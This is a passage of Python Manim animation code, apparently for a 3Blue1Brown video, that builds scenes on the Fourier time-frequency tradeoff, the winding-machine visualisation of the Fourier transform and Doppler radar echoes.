2.0/(width**2)\n return AnimationGroup(\n ApplyMethod(graph_width_tracker.set_value, a),\n graph_update_anim,\n **kwargs\n )\n change_width_anim(FRAME_X_RADIUS).update(1)\n graph_update_anim.update(0)\n\n phrases = [\n OldTexText(*words.split(\" \"))\n for words in [\n \"Very clear frequency\",\n \"Less clear frequency\",\n \"Extremely unclear frequency\",\n ]\n ]\n\n\n #Show graphs and phrases\n widths = [FRAME_X_RADIUS, 1, 0.2]\n for width, phrase in zip(widths, phrases):\n brace = Brace(Line(LEFT, RIGHT), UP)\n brace.stretch(width, 0)\n brace.next_to(graph.get_center(), UP, buff = 1.2)\n phrase.next_to(brace, UP)\n\n if width is widths[0]:\n self.play(ShowCreation(graph, rate_func=linear)),\n self.play(\n GrowFromCenter(brace),\n Write(phrase, run_time = 1)\n )\n else:\n self.play(\n change_width_anim(width),\n ReplacementTransform(\n VGroup(last_phrase, last_brace),\n VGroup(phrase, brace),\n rate_func = squish_rate_func(smooth, 0.5, 1),\n ),\n run_time = 2\n )\n self.wait()\n # self.play(*map(FadeOut, [graph, brace, phrase]))\n last_phrase = phrase\n last_brace = brace\n\n #Talk about correlations\n short_signal_words = OldTexText(\n \"Short\", \"signal\", \"correlates\",\n \"with\", \"wide range\", \"of frequencies\"\n )\n long_signal_words = OldTexText(\n \"Only\", \"wide\", \"signals\", \"correlate\",\n \"with a\", \"short range\", \"of frequencies\"\n )\n phrases = VGroup(short_signal_words, long_signal_words)\n for phrase in phrases:\n phrase.scale(0.8)\n phrase.set_color_by_tex_to_color_map({\n \"short\" : RED,\n \"long\" : GREEN,\n \"wide\" : GREEN,\n }, case_sensitive = False)\n phrases.arrange(DOWN)\n phrases.to_edge(UP)\n\n long_graph = FunctionGraph(\n lambda x : 0.5*np.sin(freq*x),\n x_min = -FRAME_WIDTH,\n x_max = FRAME_WIDTH,\n n_components = 0.001\n )\n long_graph.set_color(BLUE)\n long_graph.next_to(graph, UP, MED_LARGE_BUFF)\n\n self.play(\n ShowCreation(long_graph),\n *list(map(FadeOut, [last_brace, last_phrase]))\n )\n self.play(\n Write(short_signal_words),\n change_width_anim(widths[2])\n )\n self.play(\n long_graph.stretch, 0.35, 0,\n long_graph.set_color, GREEN,\n run_time = 5,\n rate_func = wiggle\n )\n self.wait()\n self.play(\n Write(long_signal_words),\n change_width_anim(widths[0]),\n )\n self.play(\n long_graph.stretch, 0.95, 0,\n long_graph.set_color, average_color(GREEN, BLUE),\n run_time = 4,\n rate_func = wiggle\n )\n self.wait()\n\nclass CrossOutDefinitenessAndCertainty(TeacherStudentsScene):\n def construct(self):\n words = VGroup(\n OldTexText(\"Definiteness\"),\n OldTexText(\"Certainty\"),\n )\n words.arrange(DOWN)\n words.next_to(self.teacher, UP+LEFT)\n crosses = VGroup(*list(map(Cross, words)))\n\n self.add(words)\n self.play(\n self.teacher.change, \"sassy\",\n ShowCreation(crosses[0])\n )\n self.play(\n self.change_students(*3*[\"erm\"]),\n ShowCreation(crosses[1])\n )\n self.wait(2)\n\nclass BringInFourierTranform(TeacherStudentsScene):\n def construct(self):\n fourier = OldTexText(\"Fourier\")\n fourier.scale(1.5)\n fourier.next_to(self.teacher.get_corner(UP+LEFT), UP, LARGE_BUFF)\n fourier.save_state()\n fourier.shift(DOWN)\n fourier.fade(1)\n\n self.play(\n self.teacher.change, \"raise_right_hand\",\n fourier.restore\n )\n self.play_student_changes(\"happy\", \"erm\", \"confused\")\n self.look_at(3*LEFT + 2*UP)\n self.wait(3)\n\nclass LastVideoWrapper(Scene):\n def construct(self):\n title = OldTexText(\"Visualizing the Fourier Transform\")\n title.to_edge(UP)\n screen_rect = ScreenRectangle(height = 6)\n screen_rect.next_to(title, DOWN)\n\n self.add(title)\n self.play(ShowCreation(screen_rect))\n self.wait()\n\nclass FourierRecapScene(DrawFrequencyPlot):\n CONFIG = {\n \"frequency_axes_config\" : {\n \"x_max\" : 10.0,\n \"x_axis_config\" : {\n \"unit_size\" : 0.7,\n \"numbers_to_show\" : list(range(1, 10, 1)),\n }\n },\n \"initial_winding_frequency\" : 0.1,\n }\n def construct(self):\n self.setup_axes()\n self.preview_fourier_plot()\n self.wrap_signal_around_circle()\n self.match_winding_to_beat_frequency()\n self.follow_center_of_mass()\n self.draw_fourier_plot()\n self.set_color_spike()\n\n def setup_axes(self):\n self.remove(self.pi_creature)\n time_axes = self.get_time_axes()\n time_axes.to_edge(UP, buff = MED_SMALL_BUFF)\n time_axes.scale(0.9, about_edge = UP)\n frequency_axes = self.get_frequency_axes()\n circle_plane = self.get_circle_plane()\n\n self.add(time_axes)\n\n self.set_variables_as_attrs(\n time_axes, frequency_axes,\n circle_plane\n )\n\n def preview_fourier_plot(self):\n time_graph = self.graph = self.get_time_graph(\n width = 2,\n num_graph_points = 200,\n )\n fourier_graph = self.get_fourier_transform_graph(\n time_graph\n )\n fourier_graph.pointwise_become_partial(fourier_graph, 0.1, 1)\n\n #labels\n signal_label = OldTexText(\"Signal\")\n fourier_label = OldTexText(\"Fourier transform\")\n signal_label.next_to(time_graph, UP, buff = SMALL_BUFF)\n fourier_label.next_to(fourier_graph, UP)\n fourier_label.match_color(fourier_graph)\n\n self.play(\n ShowCreation(time_graph, run_time = 2),\n Write(signal_label),\n )\n self.wait()\n self.play(\n LaggedStartMap(FadeIn, self.frequency_axes),\n ReplacementTransform(\n time_graph.copy(),\n fourier_graph,\n run_time = 2\n ),\n ReplacementTransform(\n signal_label.copy(),\n fourier_label,\n run_time = 2,\n rate_func = squish_rate_func(smooth, 0.5, 1)\n ),\n )\n self.wait()\n self.play(LaggedStartMap(\n Indicate, self.frequency_axes.x_axis.numbers,\n run_time = 4,\n rate_func = wiggle,\n ))\n self.wait()\n self.play(*list(map(FadeOut, [\n self.frequency_axes, fourier_graph,\n signal_label, fourier_label,\n ])))\n\n self.time_graph = time_graph\n self.set_variables_as_attrs(time_graph, fourier_label)\n\n def wrap_signal_around_circle(self):\n time_graph = self.time_graph\n circle_plane = self.circle_plane\n freq = self.initial_winding_frequency\n pol_graph = self.get_polarized_mobject(time_graph, freq)\n winding_freq_label = self.get_winding_frequency_label()\n winding_freq_label.add_to_back(BackgroundRectangle(winding_freq_label))\n winding_freq_label.move_to(circle_plane.get_top(), DOWN)\n\n self.add_foreground_mobjects(winding_freq_label)\n self.play(\n Write(circle_plane, run_time = 1),\n ReplacementTransform(\n time_graph.copy(), pol_graph,\n path_arc = -TAU/4,\n run_time_per_flash = 2,\n run_time = 2,\n ),\n FadeIn(winding_freq_label),\n )\n freq = 0.3\n self.change_frequency(freq, run_time = 2)\n ghost_pol_graph = pol_graph.copy()\n self.remove(pol_graph)\n self.play(ghost_pol_graph.set_stroke, {\"width\" : 0.5})\n self.play(\n *self.get_vector_animations(time_graph),\n run_time = 15\n )\n self.remove(ghost_pol_graph)\n self.wait()\n\n def match_winding_to_beat_frequency(self):\n self.v_lines_indicating_periods = self.get_v_lines_indicating_periods(0.3)\n self.add(self.v_lines_indicating_periods)\n for freq in range(1, 6):\n self.change_frequency(freq, run_time = 5)\n self.play(\n *self.get_vector_animations(\n self.time_graph,\n draw_polarized_graph = False\n ),\n run_time = 10\n )\n self.wait()\n\n def follow_center_of_mass(self):\n com_dot = self.get_center_of_mass_dot()\n self.generate_center_of_mass_dot_update_anim()\n com_arrow = Arrow(UP+3*RIGHT, ORIGIN)\n com_arrow.shift(com_dot.get_center())\n com_arrow.match_color(com_dot)\n com_words = OldTexText(\"Center of mass\")\n com_words.next_to(com_arrow.get_start(), UP)\n com_words.match_color(com_arrow)\n com_words.add_background_rectangle()\n\n com_dot.save_state()\n com_dot.move_to(com_arrow.get_start())\n com_dot.fade(1)\n\n self.play(\n com_dot.restore,\n GrowArrow(com_arrow, rate_func = squish_rate_func(smooth, 0.2, 1)),\n Write(com_words),\n )\n self.wait()\n squished_func = squish_rate_func(smooth, 0, 0.2)\n self.change_frequency(\n 4,\n added_anims = [\n FadeOut(com_arrow, rate_func = squished_func),\n FadeOut(com_words, rate_func = squished_func),\n ],\n run_time = 5\n )\n\n def draw_fourier_plot(self):\n frequency_axes = self.frequency_axes\n fourier_label = self.fourier_label\n\n self.change_frequency(0, run_time = 2)\n self.play(\n FadeIn(frequency_axes),\n FadeIn(fourier_label),\n )\n\n fourier_graph = self.get_fourier_transform_graph(self.time_graph)\n self.get_fourier_graph_drawing_update_anim(fourier_graph)\n self.generate_fourier_dot_transform(fourier_graph)\n\n self.change_frequency(5, run_time = 20)\n self.wait()\n self.change_frequency(7.5, run_time = 10)\n self.fourier_graph_drawing_update_anim = Animation(Mobject())\n self.fourier_graph = fourier_graph\n\n def set_color_spike(self):\n spike_point = self.frequency_axes.input_to_graph_point(\n 5, self.fourier_graph\n )\n circle = Circle(color = YELLOW, radius = 0.25)\n circle.move_to(spike_point)\n circle.save_state()\n circle.scale(5)\n circle.fade(1)\n\n self.change_frequency(5)\n self.play(circle.restore)\n self.play(FadeOut(circle))\n self.wait()\n for x in range(2):\n self.change_frequency(5.2, run_time = 3)\n self.change_frequency(4.8, run_time = 3)\n self.change_frequency(5, run_time = 1.5)\n self.wait()\n\n\n #########\n\n def get_time_graph(self, frequency = 5, width = 2, **kwargs):\n # low_x = center-width/2\n # high_x = center+width/2\n # new_smooth = lambda x : np.clip(smooth((x+0.5)), 0, 1)\n # def func(x):\n # pure_signal = 0.9*np.cos(TAU*frequency*x)\n # factor = new_smooth(x - low_x) - new_smooth(x-high_x)\n # return 1 + factor*pure_signal\n graph = self.time_axes.get_graph(\n lambda x : 1+0.9*np.cos(TAU*frequency*x),\n x_min = 0, x_max = width,\n **kwargs\n )\n graph.set_color(YELLOW)\n return graph\n\nclass RealPartOfInsert(Scene):\n def construct(self):\n words = OldTexText(\"(Real part of the)\")\n words.set_color(RED)\n self.add(words)\n self.play(Write(words))\n self.wait(5)\n\nclass CenterOfMassDescription(FourierRecapScene):\n def construct(self):\n self.remove(self.pi_creature)\n circle_plane = self.get_circle_plane()\n circle_plane.save_state()\n circle_plane.generate_target()\n circle_plane.target.set_height(FRAME_HEIGHT)\n circle_plane.target.center()\n circle_plane.target.axes.set_stroke(width = 2)\n circle_plane.targets.set_stroke(width = 2)\n circle_plane.target.secondary_lines.set_stroke(width = 1)\n\n start_coords = (0.5, 0.5)\n alt_coords = (0.8, 0.8)\n\n com_dot = Dot(color = self.center_of_mass_color)\n com_dot.move_to(circle_plane.coords_to_point(*start_coords))\n\n self.add(circle_plane, com_dot)\n self.wait()\n self.play(\n MoveToTarget(circle_plane),\n com_dot.move_to, \n circle_plane.target.coords_to_point(*start_coords)\n )\n self.wait()\n\n alt_com_dot = com_dot.copy().move_to(\n circle_plane.coords_to_point(*alt_coords)\n )\n\n for dot in com_dot, alt_com_dot:\n line = Line(ORIGIN, dot.get_center())\n line.match_color(com_dot)\n angle = line.get_angle()\n line.rotate(-angle, about_point = ORIGIN)\n brace = Brace(line, UP)\n words = brace.get_text(\"Strength of frequency\")\n words.add_background_rectangle()\n dot.length_label_group = VGroup(line, brace, words)\n dot.length_label_group.rotate(angle, about_point = ORIGIN)\n\n line, brace, words = com_dot.length_label_group\n self.play(\n GrowFromCenter(line),\n GrowFromCenter(brace),\n FadeIn(words),\n )\n self.wait()\n self.play(\n Transform(\n com_dot.length_label_group,\n alt_com_dot.length_label_group,\n ),\n Transform(com_dot, alt_com_dot),\n rate_func = there_and_back,\n run_time = 4,\n )\n\n #Do rotation\n line = com_dot.length_label_group[0]\n com_dot.length_label_group.remove(line)\n angle = line.get_angle()\n arc, alt_arc = [\n Arc(\n start_angle = 0, \n angle = factor*angle,\n radius = 0.5,\n )\n for factor in (1, 2)\n ]\n theta = OldTex(\"\\\\theta\")\n theta.shift(1.5*arc.point_from_proportion(0.5))\n\n self.play(\n FadeOut(com_dot.length_label_group),\n Animation(line),\n ShowCreation(arc),\n Write(theta)\n )\n self.play(\n Rotate(\n VGroup(line, com_dot),\n angle, about_point = ORIGIN\n ),\n Transform(arc, alt_arc),\n theta.move_to, 1.5*alt_arc.point_from_proportion(0.5),\n rate_func = there_and_back,\n run_time = 4\n )\n self.wait()\n\nclass AskAboutLongVsShort(TeacherStudentsScene):\n def construct(self):\n self.student_says(\n \"What happens if we \\\\\\\\ change the length of \\\\\\\\ the signal?\",\n index = 2,\n )\n self.play(\n self.teacher.change, \"happy\",\n self.change_students(\"pondering\", \"confused\", \"raise_right_hand\")\n )\n self.wait(5)\n\nclass LongAndShortSignalsInWindingMachine(FourierRecapScene):\n CONFIG = {\n \"num_fourier_graph_points\" : 1000,\n }\n def construct(self):\n self.setup_axes()\n self.extend_for_long_time()\n self.note_sharp_fourier_peak()\n self.very_short_signal()\n self.note_wide_fourier_peak()\n\n def setup_axes(self):\n FourierRecapScene.setup_axes(self)\n self.add(self.circle_plane)\n self.add(self.frequency_axes)\n self.time_graph = self.graph = self.get_time_graph(width = 2)\n self.add(self.time_graph)\n\n self.force_skipping()\n self.wrap_signal_around_circle()\n\n fourier_graph = self.get_fourier_transform_graph(self.time_graph)\n self.fourier_graph = fourier_graph\n self.add(fourier_graph)\n self.change_frequency(5)\n\n self.revert_to_original_skipping_status()\n\n def extend_for_long_time(self):\n short_time_graph = self.time_graph\n long_time_graph = self.get_time_graph(\n width = 10,\n num_graph_points = 500,\n )\n long_time_graph.set_stroke(width = 2)\n new_freq = 5.1\n long_pol_graph = self.get_polarized_mobject(\n long_time_graph,\n freq = new_freq\n )\n fourier_graph = self.fourier_graph\n\n self.change_frequency(new_freq)\n self.play(\n FadeOut(self.graph),\n FadeOut(self.graph.polarized_mobject),\n FadeOut(fourier_graph)\n )\n self.play(\n ShowCreation(long_time_graph, rate_func=linear),\n ShowCreation(long_pol_graph, rate_func=linear),\n run_time = 5\n )\n self.wait()\n\n self.time_graph = self.graph = long_time_graph\n\n def note_sharp_fourier_peak(self):\n fourier_graph = self.get_fourier_transform_graph(\n self.time_graph, \n num_graph_points = self.num_fourier_graph_points\n )\n self.fourier_graph = fourier_graph\n self.note_fourier_peak(fourier_graph, 5, 5.1)\n\n def very_short_signal(self):\n time_graph = self.time_graph\n fourier_graph = self.fourier_graph\n short_time_graph = self.get_time_graph(width = 0.6)\n new_freq = 5.1\n short_pol_graph = self.get_polarized_mobject(\n short_time_graph,\n freq = new_freq\n )\n\n self.play(\n FadeOut(fourier_graph),\n FadeOut(time_graph),\n FadeOut(time_graph.polarized_mobject),\n )\n self.play(\n ShowCreation(short_time_graph),\n ShowCreation(short_time_graph.polarized_mobject),\n )\n self.graph = self.time_graph = short_time_graph\n self.change_frequency(6.66, run_time = 5)\n\n def note_wide_fourier_peak(self):\n fourier_graph = self.get_fourier_transform_graph(\n self.graph, \n num_graph_points = self.num_fourier_graph_points\n )\n self.fourier_graph = fourier_graph\n self.note_fourier_peak(fourier_graph, 5, 6.66)\n\n\n ###\n\n def note_fourier_peak(self, fourier_graph, freq1, freq2):\n fourier_graph = self.fourier_graph\n dots = self.get_fourier_graph_dots(fourier_graph, freq1, freq2)\n self.get_center_of_mass_dot()\n self.generate_center_of_mass_dot_update_anim()\n self.generate_fourier_dot_transform(fourier_graph)\n dot = self.fourier_graph_dot\n arrow = Arrow(UP, ORIGIN, buff = SMALL_BUFF)\n arrow.next_to(dot, UP, buff = SMALL_BUFF)\n\n self.play(ShowCreation(fourier_graph))\n self.change_frequency(freq1,\n added_anims = [\n MaintainPositionRelativeTo(arrow, dot),\n UpdateFromAlphaFunc(\n arrow,\n lambda m, a : m.set_fill(opacity = a)\n ),\n ],\n run_time = 3,\n )\n self.wait()\n self.change_frequency(freq2,\n added_anims = [\n MaintainPositionRelativeTo(arrow, dot)\n ],\n run_time = 3\n )\n self.wait()\n self.play(*list(map(FadeOut, [\n dot, arrow, self.center_of_mass_dot\n ])))\n #This is not great...\n for attr in \"center_of_mass_dot\", \"fourier_graph_dot\":\n self.__dict__.pop(attr)\n\n\n def get_fourier_graph_dots(self, fourier_graph, *freqs):\n axis_point = self.frequency_axes.coords_to_point(4.5, -0.25)\n dots = VGroup()\n for freq in freqs:\n point = self.frequency_axes.input_to_graph_point(freq, fourier_graph)\n dot = Dot(point)\n dot.scale(0.5)\n dots.add(dot)\n vect = point - axis_point\n vect *= 1.3/get_norm(vect)\n arrow = Arrow(vect, ORIGIN, buff = SMALL_BUFF)\n arrow.set_color(YELLOW)\n arrow.shift(point)\n dot.arrow = arrow\n return dots\n\nclass FocusRectangleInsert(FourierRecapScene):\n CONFIG = {\n \"target_width\" : 0.5\n }\n def construct(self):\n self.setup_axes()\n self.clear()\n point = self.frequency_axes.coords_to_point(5, 0.25)\n rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)\n rect.set_stroke(YELLOW, 2)\n self.add(rect)\n self.wait()\n self.play(\n rect.stretch_to_fit_width, self.target_width,\n rect.stretch_to_fit_height, 1.5,\n rect.move_to, point,\n run_time = 2\n )\n self.wait(3)\n\nclass BroadPeakFocusRectangleInsert(FocusRectangleInsert):\n CONFIG = {\n \"target_width\" : 1.5,\n }\n\nclass CleanerFourierTradeoff(FourierTradeoff):\n CONFIG = {\n \"show_text\" : False,\n \"complex_to_real_func\" : lambda z : z.real,\n \"widths\" : [0.02, 6, 1],\n }\n\nclass MentionDopplerRadar(TeacherStudentsScene):\n def construct(self):\n words = OldTexText(\"Doppler Radar\")\n words.next_to(self.teacher, UP)\n words.save_state()\n words.shift(DOWN).fade(1)\n dish = RadarDish()\n dish.next_to(self.students, UP, buff = 2, aligned_edge = LEFT)\n plane = Plane()\n plane.to_edge(RIGHT)\n plane.align_to(dish)\n always_shift(plane, LEFT, 1)\n plane.flip()\n pulse = RadarPulse(dish, plane)\n look_at_anims = [\n Mobject.add_updater(\n pi, lambda pi : pi.look_at(pulse.mobject)\n )\n for pi in self.get_pi_creatures()\n ]\n\n self.add(dish, plane, pulse, *look_at_anims)\n self.play(\n self.teacher.change, \"hooray\",\n words.restore\n )\n self.play_student_changes(\"pondering\", \"erm\", \"sassy\")\n self.wait(2)\n self.play(\n self.teacher.change, \"happy\",\n self.change_students(*[\"thinking\"]*3)\n )\n self.wait()\n dish.set_stroke(width = 0)\n self.play(UpdateFromAlphaFunc(\n VGroup(plane, dish),\n lambda m, a : m.set_fill(opacity = 1 - a)\n ))\n\nclass IntroduceDopplerRadar(Scene):\n CONFIG = {\n \"frequency_spread_factor\" : 100,\n }\n def construct(self):\n self.setup_axes()\n self.measure_distance_with_time()\n self.show_frequency_shift()\n self.show_frequency_shift_in_fourier()\n\n def setup_axes(self):\n self.dish = RadarDish()\n self.dish.to_corner(UP+LEFT)\n axes = Axes(\n x_min = 0,\n x_max = 10,\n y_min = -1.5,\n y_max = 1.5\n )\n axes.move_to(DOWN)\n time_label = OldTexText(\"Time\")\n time_label.next_to(axes.x_axis.get_right(), UP)\n axes.time_label = time_label\n axes.add(time_label)\n self.axes = axes\n\n self.add(self.dish)\n self.add(axes)\n\n def measure_distance_with_time(self):\n dish = self.dish\n axes = self.axes\n distance = 5\n time_diff = 5\n speed = (2*distance)/time_diff\n randy = Randolph().flip()\n randy.match_height(dish)\n randy.move_to(dish.get_right(), LEFT)\n randy.shift(distance*RIGHT)\n\n pulse_graph, echo_graph, sum_graph = \\\n self.get_pulse_and_echo_graphs(\n self.get_single_pulse_graph,\n (1,), (1+time_diff,)\n )\n words = [\"Original signal\", \"Echo\"]\n for graph, word in zip([pulse_graph, echo_graph], words):\n arrow = Vector(DOWN)\n arrow.next_to(graph.peak_point, UP, SMALL_BUFF)\n arrow.match_color(graph)\n graph.arrow = arrow\n label = OldTexText(word)\n label.next_to(arrow.get_start(), UP, SMALL_BUFF)\n label.match_color(graph)\n graph.label = label\n\n double_arrow = DoubleArrow(\n pulse_graph.peak_point,\n echo_graph.peak_point,\n color = WHITE\n )\n distance_text = OldTexText(\"$2 \\\\times$ distance/(signal speed)\")\n distance_text.set_width(0.9*double_arrow.get_width())\n distance_text.next_to(double_arrow, UP, SMALL_BUFF)\n\n #v_line anim?\n\n pulse = RadarPulseSingleton(\n dish, randy, \n speed = 0.97*speed, #Just needs slightly better alignment\n )\n graph_draw = turn_animation_into_updater(\n ShowCreation(\n sum_graph, \n rate_func=linear, \n run_time = 0.97*axes.x_max\n )\n )\n randy_look_at = Mobject.add_updater(\n randy, lambda pi : pi.look_at(pulse.mobject)\n )\n axes_anim = ContinualAnimation(axes)\n\n self.add(randy_look_at, axes_anim, graph_draw)\n self.wait(0.5)\n self.add(pulse)\n self.play(\n Write(pulse_graph.label),\n GrowArrow(pulse_graph.arrow),\n run_time = 1,\n )\n self.play(randy.change, \"pondering\")\n self.wait(time_diff - 2)\n self.play(\n Write(echo_graph.label),\n GrowArrow(echo_graph.arrow),\n run_time = 1\n )\n self.wait()\n self.play(\n GrowFromCenter(double_arrow),\n FadeIn(distance_text)\n )\n self.wait()\n\n self.remove(graph_draw, pulse, randy_look_at, axes_anim)\n self.add(axes)\n self.play(LaggedStartMap(FadeOut, VGroup(\n sum_graph, randy,\n pulse_graph.arrow, pulse_graph.label,\n echo_graph.arrow, echo_graph.label,\n double_arrow, distance_text\n )))\n\n def show_frequency_shift(self):\n axes = self.axes\n dish = self.dish\n plane = Plane()\n plane.flip()\n plane.move_to(dish)\n plane.to_edge(RIGHT)\n\n time_diff = 6\n\n pulse_graph, echo_graph, sum_graph = graphs = \\\n self.get_pulse_and_echo_graphs(\n self.get_frequency_pulse_graph,\n (1,25), (1+time_diff,50)\n )\n for graph in graphs:\n graph.set_stroke(width = 3)\n signal_graph = self.get_frequency_pulse_graph(1)\n\n pulse_brace = Brace(Line(ORIGIN, RIGHT), UP)\n pulse_brace.move_to(axes.coords_to_point(1, 1.2))\n echo_brace = pulse_brace.copy()\n echo_brace.stretch(0.6, 0)\n echo_brace.move_to(axes.coords_to_point(7, 1.2))\n pulse_text = pulse_brace.get_text(\"Original signal\")\n pulse_text.add_background_rectangle()\n echo_text = echo_brace.get_text(\"Echo\")\n echo_subtext = OldTexText(\"(Higher frequency)\")\n echo_subtext.next_to(echo_text, RIGHT)\n echo_subtext.match_color(echo_graph)\n\n graph_draw = turn_animation_into_updater(\n ShowCreation(sum_graph, run_time = 8, rate_func=linear)\n )\n pulse = RadarPulse(dish, plane, n_pulse_singletons = 12)\n always_shift(plane, LEFT, 1.5)\n\n self.add(graph_draw, pulse, plane)\n self.play(UpdateFromAlphaFunc(\n plane, lambda m, a : m.set_fill(opacity = a)\n ))\n self.play(\n GrowFromCenter(pulse_brace),\n FadeIn(pulse_text),\n )\n self.wait(3)\n self.play(\n GrowFromCenter(echo_brace),\n GrowFromCenter(echo_text),\n )\n self.play(UpdateFromAlphaFunc(\n plane, lambda m, a : m.set_fill(opacity = 1-a)\n ))\n #Only for when -s is run\n graph_draw.update(10) \n self.wait(0.1)\n self.play(Write(echo_subtext, run_time = 1))\n self.wait()\n self.remove(graph_draw, pulse, plane)\n\n pulse_graph.set_stroke(width = 0)\n echo_graph.set_stroke(width = 0)\n self.time_graph_group = VGroup(\n axes, pulse_brace, pulse_text,\n echo_brace, echo_text, echo_subtext,\n pulse_graph, echo_graph, sum_graph,\n )\n self.set_variables_as_attrs(*self.time_graph_group)\n\n def show_frequency_shift_in_fourier(self):\n sum_graph = self.sum_graph\n pulse_graph = self.pulse_graph\n pulse_label = VGroup(self.pulse_brace, self.pulse_text)\n echo_graph = self.echo_graph\n echo_label = VGroup(\n self.echo_brace, self.echo_text, self.echo_subtext\n )\n\n #Setup all fourier graph stuff\n f_max = 0.02\n frequency_axes = Axes(\n x_min = 0, x_max = 20,\n x_axis_config = {\"unit_size\" : 0.5},\n y_min = -f_max, y_max = f_max,\n y_axis_config = {\n \"unit_size\" : 50,\n \"tick_frequency\" : 0.01,\n },\n )\n frequency_axes.move_to(self.axes, LEFT)\n frequency_axes.to_edge(DOWN)\n frequency_label = OldTexText(\"Frequency\")\n frequency_label.next_to(\n frequency_axes.x_axis.get_right(), UP,\n )\n frequency_label.to_edge(RIGHT)\n frequency_axes.add(frequency_label)\n\n for graph in pulse_graph, echo_graph, sum_graph:\n graph.fourier_transform = get_fourier_graph(\n frequency_axes, graph.underlying_function,\n frequency_axes.x_min, 25,\n complex_to_real_func = abs,\n )\n\n #Braces labeling F.T.\n original_fourier_brace = Brace(\n Line(\n frequency_axes.coords_to_point(7, 0.9*f_max),\n frequency_axes.coords_to_point(9, 0.9*f_max),\n ),\n UP,\n ).set_color(BLUE)\n echo_fourier_brace = Brace(\n Line(\n frequency_axes.coords_to_point(14, 0.4*f_max),\n frequency_axes.coords_to_point(18, 0.4*f_max),\n ),\n UP,\n ).set_color(YELLOW)\n # braces = [original_fourier_brace, echo_fourier_brace]\n # words = [\"original signal\", \"echo\"]\n # for brace, word in zip(braces, words):\n # brace.add(brace.get_text(\"F.T. of \\\\\\\\ %s\"%word))\n fourier_label = OldTex(\"||\\\\text{Fourier transform}||\")\n # fourier_label.next_to(sum_graph.fourier_transform, UP, MED_LARGE_BUFF)\n fourier_label.next_to(frequency_axes.y_axis, UP, buff = SMALL_BUFF)\n fourier_label.shift_onto_screen()\n fourier_label.set_color(RED)\n\n\n #v_lines\n v_line = DashedLine(\n frequency_axes.coords_to_point(8, 0),\n frequency_axes.coords_to_point(8, 1.2*f_max),\n color = YELLOW,\n dash_length = 0.025,\n )\n v_line_pair = VGroup(*[\n v_line.copy().shift(u*0.6*RIGHT)\n for u in (-1, 1)\n ])\n v_line = VGroup(v_line)\n\n double_arrow = DoubleArrow(\n frequency_axes.coords_to_point(8, 0.007),\n frequency_axes.coords_to_point(16, 0.007),\n buff = 0,\n color = WHITE\n )\n\n self.play(\n self.time_graph_group.to_edge, UP,\n ApplyMethod(\n self.dish.shift, 2*UP, \n remover = True\n ),\n FadeIn(frequency_axes)\n )\n self.wait()\n self.play(\n FadeOut(sum_graph),\n FadeOut(echo_label),\n pulse_graph.set_stroke, {\"width\" : 3},\n )\n self.play(\n ReplacementTransform(\n pulse_label[0].copy(),\n original_fourier_brace\n ),\n ShowCreation(pulse_graph.fourier_transform)\n )\n self.play(Write(fourier_label))\n self.wait()\n self.play(ShowCreation(v_line))\n self.wait()\n self.play(ReplacementTransform(v_line, v_line_pair))\n self.wait()\n self.play(FadeOut(v_line_pair))\n self.wait()\n\n self.play(\n FadeOut(pulse_graph),\n FadeIn(sum_graph),\n ReplacementTransform(\n pulse_graph.fourier_transform,\n sum_graph.fourier_transform\n )\n )\n self.play(FadeIn(echo_label))\n self.play(ReplacementTransform(\n echo_label[0].copy(),\n echo_fourier_brace,\n ))\n self.wait(2)\n self.play(GrowFromCenter(double_arrow))\n self.wait()\n\n\n ###\n\n def get_graph(self, func, **kwargs):\n graph = self.axes.get_graph(func, **kwargs)\n graph.peak_point = self.get_peak_point(graph)\n return graph\n\n def get_single_pulse_graph(self, x, **kwargs):\n return self.get_graph(self.get_single_pulse_function(x), **kwargs)\n\n def get_single_pulse_function(self, x):\n return lambda t : -2*np.sin(10*(t-x))*np.exp(-100*(t-x)**2)\n\n def get_frequency_pulse_graph(self, x, freq = 50, **kwargs):\n return self.get_graph(\n self.get_frequency_pulse_function(x, freq), \n num_graph_points = 700,\n **kwargs\n )\n\n def get_frequency_pulse_function(self, x, freq):\n factor = self.frequency_spread_factor\n return lambda t : op.mul(\n 2*np.cos(2*freq*(t-x)),\n min(np.exp(-(freq**2/factor)*(t-x)**2), 0.5)\n )\n\n def get_peak_point(self, graph):\n anchors = graph.get_anchors()\n return anchors[np.argmax([p[1] for p in anchors])]\n\n def get_pulse_and_echo_graphs(self, func, args1, args2):\n pulse_graph = func(*args1, color = BLUE)\n echo_graph = func(*args2, color = YELLOW)\n sum_graph = self.axes.get_graph(\n lambda x : sum([\n pulse_graph.underlying_function(x),\n echo_graph.underlying_function(x),\n ]),\n num_graph_points = echo_graph.get_num_curves(),\n color = WHITE\n )\n sum_graph.background_image_file = \"blue_yellow_gradient\"\n return pulse_graph, echo_graph, sum_graph\n\nclass DopplerFormulaInsert(Scene):\n def construct(self):\n formula = OldTex(\n \"f_{\\\\text{echo}\", \"=\",\n \"\\\\left(1 + \\\\frac{v}{c}\\\\right)\",\n \"f_{\\\\text{pulse}}\"\n )\n formula[0].set_color(BLUE)\n formula[3].set_color(YELLOW)\n\n randy = Randolph(color = BLUE_C)\n formula.scale(1.5)\n formula.next_to(randy, UP+LEFT)\n formula.shift_onto_screen()\n\n self.add(randy)\n self.play(\n LaggedStartMap(FadeIn, formula),\n randy.change, \"pondering\", randy.get_bottom(),\n )\n self.play(Blink(randy))\n self.wait(2)\n self.play(Blink(randy))\n self.wait()\n\nclass MentionPRFNuance(TeacherStudentsScene):\n def construct(self):\n title = OldTexText(\n \"Speed of light\", \"$\\\\gg$\", \"Speed of a plane\"\n )\n title.to_edge(UP)\n self.add(title)\n\n axes = self.axes = Axes(\n x_min = 0, x_max = 10,\n y_min = 0, y_max = 2,\n )\n axes.next_to(title, DOWN, buff = MED_LARGE_BUFF)\n frequency_label = OldTexText(\"Frequency\")\n frequency_label.scale(0.7)\n frequency_label.next_to(axes.x_axis.get_right(), UP)\n axes.add(frequency_label)\n self.add(axes)\n\n pulse_x, shift_x = 4, 6\n pulse_graph = self.get_spike_graph(pulse_x)\n shift_graph = self.get_spike_graph(shift_x)\n shift_graph.set_stroke(YELLOW, 2)\n peak_points = VGroup(pulse_graph.peak_point, shift_graph.peak_point)\n self.add(pulse_graph)\n\n brace = Brace(peak_points, UP, buff = SMALL_BUFF)\n displayed_doppler_shift = OldTexText(\"How I'm showing the \\\\\\\\\", \"Doppler shift\")\n actual_doppler_shift = OldTexText(\"Actual\\\\\\\\\", \"Doppler shift\")\n doppler_shift_words = VGroup(displayed_doppler_shift, actual_doppler_shift)\n 